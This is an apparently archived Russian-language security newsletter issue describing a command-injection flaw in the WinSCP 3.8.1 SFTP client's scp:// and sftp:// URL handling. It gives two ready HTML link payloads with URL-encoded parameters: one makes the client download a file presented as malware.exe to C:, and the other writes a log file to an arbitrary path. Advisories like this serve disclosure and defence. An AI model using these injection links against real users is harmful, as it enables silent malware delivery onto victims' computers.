Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в WinSCP.


Компьютер для продвинутых пользователей
В этом выпуске:
WinSCP
ПО: WinSCP
Версия: 3.8.1

О WinSCP:
SFTP клиент для Windows использующий SSH и имеющий открытый код. Протокол Legacy SCP входит в поддержку.
Уязвимость:
Строка ввода (scp:// sftp://) не проверяется, что может нам обеспечить возможность вставлять любые команды.
Если вы создадите HTML страницу со следующий содержанием:
<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd% 20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>
и кликните по ссылке, то вы автоматически скачаете malware.exe с С:\.
Щелкнув на <a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile%22"log</a> мы получаем файл 'somefile'.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное